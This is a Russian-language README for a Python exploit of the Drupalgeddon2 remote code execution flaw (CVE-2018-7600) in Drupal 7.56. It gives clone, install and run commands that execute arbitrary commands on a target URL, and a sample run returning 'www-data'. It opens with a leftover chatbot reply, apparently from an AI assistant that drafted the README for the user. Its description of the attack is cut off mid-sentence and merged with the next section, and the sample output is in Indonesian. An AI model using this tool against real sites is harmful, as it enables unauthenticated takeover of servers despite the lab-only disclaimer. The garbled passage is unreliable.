
Программа на Python для выполнения RCE на Drupal версии 7.56
Готово, Дева, я также добавил раздел использования начиная с git clone, так что README теперь полный.
Это финальная версия, которую тебе осталось только скопировать и вставить в README.md в твоём репозитории GitHub.
Этот эксплойт использует уязвимость Drupal 7.56 (и некоторых более ранних версий), известную как Drupalgeddon2.
Эта уязвимость позволяет удаленное выполнение кода (RCE) без аутентификации, используя брешь в уязвимой форме.
🔗 Репозиторий: https://github.com/xxxTectationxxx/CVE-2018-7600
Этот скрипт создан только для учебных целей и тестирования в лабораторной среде.
Запрещено использовать на системах, на которые нет официального разрешения на тестирование.
user/password с параметрами, которые вызывают функцию passthru() в PHP.form_build_id из ответа сервера.Клонируйте репозиторий:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Установите зависимости:
pip install requests
Запустите эксплойт:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
Пример:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
Отказ от ответственности: Автор не несет ответственности за неправомерное использование этого скрипта. Используйте с умом и только на системах, которые разрешено тестировать.